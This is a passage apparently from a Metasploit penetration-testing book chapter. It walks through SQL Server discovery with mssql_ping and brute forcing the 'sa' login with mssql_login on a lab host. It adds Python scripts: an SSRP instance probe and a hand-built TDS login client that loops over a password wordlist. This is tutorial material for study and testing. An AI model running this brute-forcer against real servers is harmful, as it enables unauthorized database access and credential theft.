Chapter 6
[*] SQL Server information for 192.168.33.130:
[*] ServerName = IHAZSECURITY
[*] InstanceName = SQLEXPRESS
[*] IsClustered = No
[*] Version = 9.00.1399.06
[*] tcp = 1433
[*] np = \\IHAZSECURITY\pipe\MSSQL$SQLEXPRESS\sql\query
[*] Scanned 129 of 256 hosts (050% complete)
After calling the mssql_ping module with use scanner/mssql/mssql_ping and setting our options, we see that a SQL Server installation is found at 192.168.33.130. The name of the server is IHAZSECURITY. Its version number, 9.00.1399.06, equates to SQL Server 2005 (the RTM build; the SQLEXPRESS instance name tells us it is the Express edition), and we know that it's listening on TCP port 1433. Note that mssql_ping gets all of this from the SQL Server Browser service on UDP 1434, not from port 1433 itself, so a host with UDP 1434 filtered will not show up here even though SQL Server is running on it.
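What mssql_ping sends and receives, as an added example that is not code from the book or from Metasploit: the module speaks the SQL Server Resolution Protocol (MS-SQLR) to the SQL Browser service on UDP 1434. The script below sends the same one-byte CLNT_UCAST_EX probe, parses the reply into the fields shown above, and maps the Version field to a product name; because an unauthenticated UDP reply is trivially spoofable, the parser rejects anything whose length field does not match the datagram. The embedded datagram is constructed from this page's output, not captured, and the product-name table is my own addition.

```python
"""SQL Server Resolution Protocol (SSRP, UDP 1434) instance discovery.

Added example, not code from the book or from Metasploit; it sends the same
single-byte CLNT_UCAST_EX probe that mssql_ping sends and parses the reply per
MS-SQLR: 0x05, little-endian uint16 length, then a ';'-separated key/value
string in which instances are separated by ';;'. The sample datagram at the
bottom is constructed from the book's output, not captured.
"""
from __future__ import annotations
import socket
import struct

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x02"  # "report every instance on this host"
SVR_RESP = 0x05


def parse_ssrp_response(data: bytes) -> list[dict[str, str]]:
    """One dict per advertised instance; ValueError on anything malformed (UDP replies are easy to spoof)."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + length]
    if len(body) != length:
        raise ValueError("SSRP length field exceeds datagram size")
    instances = []
    for record in body.decode("ascii", errors="replace").split(";;"):
        if not record:
            continue  # trailing ';;' after the last instance
        fields = record.split(";")
        if len(fields) % 2:
            raise ValueError(f"unpaired field in SSRP record: {record!r}")
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def product_name(version: str) -> str:
    """Map the Version field's major number to the marketing name (10.50 is 2008 R2)."""
    major, minor = (int(x) for x in version.split(".")[:2])
    names = {8: "2000", 9: "2005", 10: "2008 R2" if minor >= 50 else "2008", 11: "2012",
             12: "2014", 13: "2016", 14: "2017", 15: "2019", 16: "2022"}
    return "SQL Server " + names.get(major, f"(unknown major {major})")


def ssrp_ping(host: str, timeout: float = 2.0) -> list[dict[str, str]]:
    """Probe one host; [] means no reply (no SQL Browser, UDP 1434 filtered, or no instances)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        try:
            data, _ = sock.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_ssrp_response(data)


def report(host: str, instances: list[dict[str, str]]) -> list[str]:
    """Render instances in mssql_ping's style, plus the product name derived from Version."""
    lines = [f"[*] SQL Server information for {host}:"]
    for inst in instances:
        lines += [f"[*] {key} = {value}" for key, value in inst.items()]
        if "Version" in inst:
            lines.append(f"[*] Product = {product_name(inst['Version'])}")
    return lines


# Constructed to match the book's 192.168.33.130 result; not a real capture.
SAMPLE_RECORD = (b"ServerName;IHAZSECURITY;InstanceName;SQLEXPRESS;IsClustered;No;Version;9.00.1399.06;"
                 b"tcp;1433;np;" + rb"\\IHAZSECURITY\pipe\MSSQL$SQLEXPRESS\sql\query" + b";;")
SAMPLE_DATAGRAM = bytes([SVR_RESP]) + struct.pack("<H", len(SAMPLE_RECORD)) + SAMPLE_RECORD

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    found = ssrp_ping(target) if target else parse_ssrp_response(SAMPLE_DATAGRAM)
    print("\n".join(report(target or "192.168.33.130", found)))
```

Run it with a host argument to probe a live target, or with no argument to parse the constructed datagram. A named instance on a dynamic port shows up here with whatever tcp value the Browser advertises, which is the practical reason to query UDP 1434 before assuming 1433.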
Brute Forcing MS SQL Server
Next, we brute force the server with the Framework's mssql_login module:
msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        The password for the specified username
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             1433             yes       The target port
   THREADS           1                yes       The number of concurrent threads
   USERNAME          sa               no        The username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mssql_login) > set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt
PASS_FILE => /pentest/exploits/fasttrack/bin/dict/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.33.130
RHOSTS => 192.168.33.130
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > set verbose false
verbose => false
msf auxiliary(mssql_login) > exploit
[+] 192.168.33.130:1433 - MSSQL - successful login 'sa' : 'password123'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
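The exchange behind each mssql_login attempt, as an added stand-alone example (not the book's or Metasploit's code): a TDS PRELOGIN that declares encryption unsupported, a LOGIN7 packet in which the password is merely obfuscated (nibble swap and XOR 0xA5, not encrypted, so it is readable on the wire), and a walk over the response tokens looking for LOGINACK or an ERROR such as 18456. It assumes a server that does not force encryption, as a default SQL Server 2005 install does not; if the server answers ENCRYPT_REQ the client stops rather than sending credentials. The hostname WORKSTATION and application name python are arbitrary client identifiers, and the two sample responses at the bottom are constructed so the parser can be checked offline.

```python
"""Hand-rolled TDS 7.1 login: one attempt of the kind mssql_login makes per password.
Added example, not code from the book or from Metasploit; layouts follow MS-TDS (PRELOGIN,
LOGIN7, response tokens). Encryption is declared unsupported (ENCRYPT_NOT_SUP) so LOGIN7 goes
in clear text; a server with Force Encryption on answers ENCRYPT_REQ and we stop there.
"""
import socket, struct, sys

TDS_PRELOGIN, TDS_LOGIN7, ENCRYPT_NOT_SUP, ENCRYPT_REQ = 0x12, 0x10, 0x02, 0x03
TOK_LOGINACK, TOK_ERROR, TOK_DONE = 0xAD, 0xAA, (0xFD, 0xFE, 0xFF)

def encode_password(pw):
    """LOGIN7 password obfuscation: swap the nibbles of every UTF-16LE byte, then XOR with 0xA5."""
    return bytes((((b << 4) & 0xF0) | (b >> 4)) ^ 0xA5 for b in pw.encode("utf-16-le"))

def tds_packet(ptype, payload):
    """8-byte TDS header: type, status 0x01 (end of message), big-endian length, SPID, packet id, window."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(payload), 0, 1, 0) + payload

def build_prelogin(instance="MSSQLServer"):
    """PRELOGIN with VERSION, ENCRYPTION, INSTOPT, THREADID (option tokens 0..3) and the 0xFF terminator."""
    items = [b"\x09\x00\x00\x00\x00\x00", bytes([ENCRYPT_NOT_SUP]), instance.encode() + b"\x00", b"\x00" * 4]
    table, off = b"", 5 * len(items) + 1
    for token, item in enumerate(items):
        table += struct.pack(">BHH", token, off, len(item))
        off += len(item)
    return tds_packet(TDS_PRELOGIN, table + b"\xff" + b"".join(items))

def prelogin_encryption(msg):
    """The ENCRYPTION byte (option token 1) of a PRELOGIN message; works on requests and responses alike."""
    pos = 0
    while msg[pos] != 0xFF:
        token, off, _ = struct.unpack_from(">BHH", msg, pos)
        if token == 1:
            return msg[off]
        pos += 5
    raise ValueError("PRELOGIN message carries no ENCRYPTION option")

def build_login7(user, password, host="WORKSTATION", server=""):
    """LOGIN7 for TDS 7.1: 36-byte fixed header, 50 bytes of offset/length pairs, then the UTF-16LE fields."""
    texts = [host, user, password, "python", server, "", "python", "", ""]  # HostName..Database in spec order
    blobs = [encode_password(t) if i == 2 else t.encode("utf-16-le") for i, t in enumerate(texts)]
    table, off = b"", 86                                   # variable data starts right after the fixed part
    for text, blob in zip(texts, blobs):
        table += struct.pack("<HH", off, len(text))        # offset in bytes, length in characters
        off += len(blob)
    table += b"\x00" * 6 + struct.pack("<HHHH", off, 0, off, 0)  # ClientID (MAC), SSPI, AtchDBFile
    body = b"".join(blobs)
    # Length, TDSVersion 7.1, packet size, prog ver, PID, conn id, OptionFlags1/2, TypeFlags, OptionFlags3, TZ, LCID
    fixed = struct.pack("<6I4BiI", 86 + len(body), 0x71000001, 4096, 7, 0, 0, 0xE0, 0x03, 0, 0, 0, 0x0409)
    return tds_packet(TDS_LOGIN7, fixed + table + body)

def parse_login_response(msg):
    """Walk the token stream: (True, server program name) on LOGINACK, (False, reason) on ERROR."""
    pos = 0
    while pos < len(msg):
        tok = msg[pos]
        if tok == TOK_LOGINACK:                            # len(2) iface(1) tdsver(4) B_VARCHAR progname
            n = msg[pos + 8]
            return True, msg[pos + 9:pos + 9 + 2 * n].decode("utf-16-le")
        if tok == TOK_ERROR:                               # len(2) number(4) state(1) class(1) US_VARCHAR text
            number, = struct.unpack_from("<I", msg, pos + 3)
            n, = struct.unpack_from("<H", msg, pos + 9)
            return False, f"error {number}: {msg[pos + 11:pos + 11 + 2 * n].decode('utf-16-le')}"
        pos += 9 if tok in TOK_DONE else 3 + struct.unpack_from("<H", msg, pos + 1)[0]
    return False, "no LOGINACK or ERROR token in response"

def read_message(rfile):
    """Reassemble one TDS message from its packets (status bit 0 marks the last packet)."""
    out = b""
    while True:
        header = rfile.read(8)
        if len(header) < 8:
            raise ConnectionError("server closed the connection")
        _, status, length = struct.unpack(">BBH", header[:4])
        out += rfile.read(length - 8)
        if status & 0x01:
            return out

def try_login(host, port, user, password, timeout=5.0):
    """One credential check; every failure lands in the SQL Server errorlog as 18456, so this is noisy by design."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")
        sock.sendall(build_prelogin())
        if prelogin_encryption(read_message(rfile)) == ENCRYPT_REQ:
            raise RuntimeError("server forces TLS; refusing to send LOGIN7 in clear text")
        sock.sendall(build_login7(user, password, server=host))
        return parse_login_response(read_message(rfile))

_PROG = "Microsoft SQL Server".encode("utf-16-le")          # constructed responses below, not captures
SAMPLE_LOGINACK = (b"\xe3\x05\x00\x01\x01\x61\x00\x00" + b"\xad" + struct.pack("<H", 10 + len(_PROG)) + b"\x01"
                   + struct.pack("<I", 0x71000001) + bytes([len(_PROG) // 2]) + _PROG + b"\x09\x00\x13\x99")
_TEXT = "Login failed for user 'sa'.".encode("utf-16-le")
SAMPLE_ERROR = (b"\xaa" + struct.pack("<H", 12 + len(_TEXT)) + struct.pack("<I", 18456) + b"\x01\x0e"
                + struct.pack("<H", len(_TEXT) // 2) + _TEXT + b"\x00\x00\x00\x00")

if __name__ == "__main__":                                 # usage: tds_login.py HOST USER WORDLIST
    host, user, wordlist = sys.argv[1:4]
    for line in open(wordlist, encoding="utf-8", errors="ignore"):
        ok, detail = try_login(host, 1433, user, line.rstrip("\r\n"))
        print(("[+] " if ok else "[-] ") + f"{user}:{line.rstrip()} -> {detail}")
        if ok:
            break
```

Two practical points follow from the code. First, because the LOGIN7 password is only nibble-swapped and XORed, anyone capturing the unencrypted session, including your own brute-force traffic, can recover every password tried; Force Encryption on the server is what stops that, and it is also what makes this client (and an unencrypted mssql_login run) fail at the PRELOGIN step. Second, each failed attempt is an error 18456 in the server's errorlog and, on SQL Server 2005 with CHECK_POLICY enabled for the login, can count towards the Windows lockout policy, so a long wordlist against sa can lock the very account you are trying to open.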